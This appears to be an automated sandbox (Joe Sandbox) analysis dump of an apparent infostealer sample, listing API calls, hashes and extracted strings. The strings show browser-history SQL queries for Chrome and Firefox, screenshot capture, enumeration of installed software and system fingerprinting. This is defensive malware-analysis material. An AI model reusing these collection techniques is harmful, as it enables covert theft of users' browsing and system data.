              • Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc$CurrentProcess
              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
              • API String ID: 3877065590-4127804628
              • Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
              • Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
              • Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
              • Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock
              • String ID:
              • API String ID: 554701316-0
              • Opcode ID: e2b5f795840abe0cdfee08c392733b5e67dc510a1a83f3380b4137c14902342c
              • Instruction ID: 60e25583bf21ddf359af24540fb3fb910c2de0748bd9b4453c647fe15e88e3d2
              • Opcode Fuzzy Hash: e2b5f795840abe0cdfee08c392733b5e67dc510a1a83f3380b4137c14902342c
              • Instruction Fuzzy Hash: 7D21D535204620FBD7227F26F90291AB7E0DF99724F60812FFC9496261DB7D9C0196DD
              APIs
              • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
              • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
              • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
              • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                • Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                • Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: Open$EnumFreeString$QueryValue
              • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
              • API String ID: 811798878-3013244427
              • Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
              • Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
              • Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
              • Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D
              APIs
              • GetDC.USER32(00000000), ref: 00417994
              • CreateCompatibleDC.GDI32(00000000), ref: 0041799D
              • CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
              • SelectObject.GDI32(00000000,00000000), ref: 004179B6
              • BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
              • CreateStreamOnHGlobal.COMBASE(00000000,000000FF,00000000), ref: 004179E8
              • GetHGlobalFromStream.COMBASE(?,?), ref: 00417A76
              • GlobalLock.KERNEL32(?), ref: 00417A80
              • GlobalUnlock.KERNEL32(?), ref: 00417AA2
              • DeleteObject.GDI32(00000000), ref: 00417AA8
              • DeleteDC.GDI32(00000000), ref: 00417AAE
              • ReleaseDC.USER32(00000000,00000000), ref: 00417AB6
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: Global$Create$CompatibleDeleteObjectStream$BitmapFromLockReleaseSelectUnlock
              • String ID:
              • API String ID: 734935659-0
              • Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
              • Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
              • Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
              • Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58
              APIs
              • __getptd.LIBCMT ref: 004324F7
              • __calloc_crt.LIBCMT ref: 00432517
              • __lock.LIBCMT ref: 0043252D
              • __copytlocinfo_nolock.LIBCMT ref: 0043253B
              • __lock.LIBCMT ref: 00432583
              • __updatetlocinfoEx_nolock.LIBCMT ref: 00432595
              • ___removelocaleref.LIBCMT ref: 0043259B
              • __updatetlocinfoEx_nolock.LIBCMT ref: 004325B9
                • Part of subcall function 00425F69: __getptd_noexit.LIBCMT ref: 00425F69
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__getptd__getptd_noexit
              • String ID:
              • API String ID: 1862253221-0
              • Opcode ID: 01cf2d2ec68c58b77b90d1b7d04f180263721bcb8f41eea91ea22d9b3b4d1951
              • Instruction ID: 6ee0ea7bdf63bc5c1fe8ff61e410bfb6e0a456f43e437c98b75c721c4f22a120
              • Opcode Fuzzy Hash: 01cf2d2ec68c58b77b90d1b7d04f180263721bcb8f41eea91ea22d9b3b4d1951
              • Instruction Fuzzy Hash: 6831D471A05304ABDB14AFA1EA4675E77E0EF48314F50942FF80556292CFBC9A40CB1D
              APIs
              • WriteProfileStringA.KERNEL32(0043CF08,0043CEF0,0043CEE8), ref: 0042361F
              • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00423639
              • GetVolumePathNamesForVolumeNameA.KERNEL32(0043CF28,?,00000000,?), ref: 00423654
              • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00423660
              • ReplaceFileA.KERNEL32(0043CF6C,0043CF58,0043CF50,00000000,00000000,00000000), ref: 0042367B
              • HeapUnlock.KERNEL32(00000000), ref: 00423683
              • SetEnvironmentVariableW.KERNEL32(00000000,00000000), ref: 0042368D
              • GetCommandLineA.KERNEL32 ref: 00423693
              • GetSystemDirectoryW.KERNEL32(?,00000000), ref: 004236A2
              • GetModuleHandleA.KERNEL32(0043CF78), ref: 004236AD
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: Volume$CommandConsoleDirectoryEnumEnvironmentFileFormatsHandleHeapLineModuleNameNamesPathProfileReadReplaceStringSystemTimeUnlockVariableWrite
              • String ID:
              • API String ID: 1949392090-0
              • Opcode ID: e3cfa6fea76b87030229f4266a356c8920b630cb0817ea322c581eebe556a332
              • Instruction ID: 1a9988db0f51be1140eafa59a46ef6f26b5edf116ddf57a622c0808246e52eae
              • Opcode Fuzzy Hash: e3cfa6fea76b87030229f4266a356c8920b630cb0817ea322c581eebe556a332
              • Instruction Fuzzy Hash: 4E11E176AC4344BBE7109BA0DD8BF997769AB0CB02F1000A1B305FE0E1CAB4A5458B6D
              APIs
              • GetTickCount.KERNEL32 ref: 004129E8
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
              • DeleteFileW.KERNEL32(00000000), ref: 00412C05
              Strings
              • .tmp, xrefs: 00412A03
              • , xrefs: 00412B98
              • %TEMP%, xrefs: 00412A23
              • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: File$CopyCountDeleteTick
              • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
              • API String ID: 2381671008-351388873
              • Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
              • Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
              • Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
              • Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58
              APIs
              • GetTickCount.KERNEL32 ref: 004125B0
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
              • DeleteFileW.KERNEL32(00000000), ref: 004127CD
              Strings
              • %TEMP%, xrefs: 004125EB
              • .tmp, xrefs: 004125CB
              • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
              • , xrefs: 00412760
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: File$CopyCountDeleteTick
              • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
              • API String ID: 2381671008-462058183
              • Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
              • Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
              • Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
              • Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58
              APIs
              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FreeString$InfoSystem
              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
              • API String ID: 4070941872-1038824218
              • Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
              • Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
              • Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
              • Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58
              APIs
              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FreeString$InfoSystem
              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
              • API String ID: 4070941872-1038824218
              • Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
              • Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
              • Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
              • Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58
              APIs
              • __getptd.LIBCMT ref: 0042AB4D
                • Part of subcall function 0042869D: __getptd_noexit.LIBCMT ref: 004286A0
                • Part of subcall function 0042869D: __amsg_exit.LIBCMT ref: 004286AD
              • __amsg_exit.LIBCMT ref: 0042AB6D
              • __lock.LIBCMT ref: 0042AB7D
              • InterlockedDecrement.KERNEL32(?), ref: 0042AB9A
              • _free.LIBCMT ref: 0042ABAD
              • InterlockedIncrement.KERNEL32(00442690), ref: 0042ABC5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
              • String ID: h"D
              • API String ID: 3470314060-1871085603
              • Opcode ID: c78cffae1ce7fb4b31c6c523806551106b4e0418e83a8d34b454a12d7a5f08c9
              • Instruction ID: daae66e29feea988ff867385fbaf3e1678727e6f048656515397907ada06cf88
              • Opcode Fuzzy Hash: c78cffae1ce7fb4b31c6c523806551106b4e0418e83a8d34b454a12d7a5f08c9
              • Instruction Fuzzy Hash: 6701A132B01631ABD710AF25B94575E7B61BB00714F85019BFE10A7691CB7C7A91CBCE
              APIs
              • GetModuleHandleW.KERNEL32(0043DBD4,00440230,00000008,00428678,00000000,00000000,?,?,00425F6E,00425B73,?,?,00423971,00000000), ref: 00428581
              • __lock.LIBCMT ref: 004285B5
                • Part of subcall function 00428E2C: __mtinitlocknum.LIBCMT ref: 00428E42
                • Part of subcall function 00428E2C: __amsg_exit.LIBCMT ref: 00428E4E
                • Part of subcall function 00428E2C: RtlEnterCriticalSection.NTDLL(00000000), ref: 00428E56
              • InterlockedIncrement.KERNEL32(?), ref: 004285C2
              • __lock.LIBCMT ref: 004285D6
              • ___addlocaleref.LIBCMT ref: 004285F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
              • String ID: h"D$q9B
              • API String ID: 637971194-773263424
              • Opcode ID: cb034427e11c4b89fc2f08806244b4fc54a6fcd13b86a61d5afa892cfb624b7e
              • Instruction ID: 3a8f04d1f40cfa8200e3906c038708a6bd9f88cc540cc5f9db8b441ba29455b9
              • Opcode Fuzzy Hash: cb034427e11c4b89fc2f08806244b4fc54a6fcd13b86a61d5afa892cfb624b7e
              • Instruction Fuzzy Hash: 89015E71A417009BE7209F76E90670EFBE0AF10324F50854FE495963A1CFB8A944CB19
              APIs
              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
              • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
              • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: FileHandleWrite$Message
              • String ID: Error$Runtime error at 00000000
              • API String ID: 1570097196-2970929446
              • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
              • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
              • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
              • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
              APIs
              • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
              • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
              • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
              • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CharNext
              • String ID:
              • API String ID: 3213498283-0
              • Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
              • Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
              • Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
              • Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
              APIs
              • GetTickCount.KERNEL32 ref: 00410EB4
              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
              • DeleteFileW.KERNEL32(00000000), ref: 004110EC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: File$CopyCountDeleteTick
              • String ID: $%TEMP%$.tmp
              • API String ID: 2381671008-2792595090
              • Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
              • Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
              • Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
              • Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58
              APIs
              • GetModuleHandleW.KERNEL32(0043DBD4,?,00425E3A), ref: 00428868
              • __mtterm.LIBCMT ref: 00428874
                • Part of subcall function 00428533: RtlDecodePointer.NTDLL(00441E80), ref: 00428544
                • Part of subcall function 00428533: TlsFree.KERNEL32(00441E84,004289D6,?,00425E3A), ref: 0042855E
                • Part of subcall function 00428533: _free.LIBCMT ref: 00428D04
              • TlsAlloc.KERNEL32(?,00425E3A), ref: 00428901
              • __init_pointers.LIBCMT ref: 00428926
              • __calloc_crt.LIBCMT ref: 00428994
              • GetCurrentThreadId.KERNEL32 ref: 004289C0
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
              • String ID:
              • API String ID: 347030822-0
              • Opcode ID: ad6de0f5bdc587c8bb08565aa090d42b12e8146025ae027129b3057423f6f460
              • Instruction ID: 8383bb41cacc3f466536d41129240b0fe1aec606d7baca788f231752a80ed095
              • Opcode Fuzzy Hash: ad6de0f5bdc587c8bb08565aa090d42b12e8146025ae027129b3057423f6f460
              • Instruction Fuzzy Hash: 28316671E01361AAC711AF75BC8461B7AA4EB44798B54093FE800DB2B6EF789442CFDD
              APIs
              • __lock.LIBCMT ref: 004317B8
                • Part of subcall function 00428E2C: __mtinitlocknum.LIBCMT ref: 00428E42
                • Part of subcall function 00428E2C: __amsg_exit.LIBCMT ref: 00428E4E
                • Part of subcall function 00428E2C: RtlEnterCriticalSection.NTDLL(00000000), ref: 00428E56
              • InterlockedDecrement.KERNEL32(00000000), ref: 004317CA
              • _free.LIBCMT ref: 004317DF
                • Part of subcall function 0042B379: HeapFree.KERNEL32(00000000,00000000,?,0042868E,00000000,?,?,00425F6E,00425B73,?,?,00423971), ref: 0042B38F
                • Part of subcall function 0042B379: GetLastError.KERNEL32(00000000,?,0042868E,00000000,?,?,00425F6E,00425B73,?,?,00423971), ref: 0042B3A1
              • __lock.LIBCMT ref: 004317F8
              • ___removelocaleref.LIBCMT ref: 00431807
              • ___freetlocinfo.LIBCMT ref: 00431820
              • _free.LIBCMT ref: 0043183D
              Memory Dump Source
              • Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd
              Similarity
              • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
              • String ID:
              • API String ID: 556454624-0
              • Opcode ID: 5c5f0fca78b213f1fe9775b2eb13d4225c097266beb984ad550eb2432f9b29d8
              • Instruction ID: b2e398cb16d27c65bb4104a513259ea536f59f8bf22d6f583ce5cb3e230796cc
              • Opcode Fuzzy Hash: 5c5f0fca78b213f1fe9775b2eb13d4225c097266beb984ad550eb2432f9b29d8
              • Instruction Fuzzy Hash: 9D119A21602204AAEB24AFA5A84572E73D4AF08764FA4551FF894DB2A1DF7C8C80C66D
              APIs
              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
              • LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$LibraryLoad
              • String ID:
              • API String ID: 2238633743-0
              • Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
              • Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
              • Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
              • Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8
              APIs
              • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
              • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
              • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
              • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
              • String ID:
              • API String ID: 3782394904-0
              • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
              • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
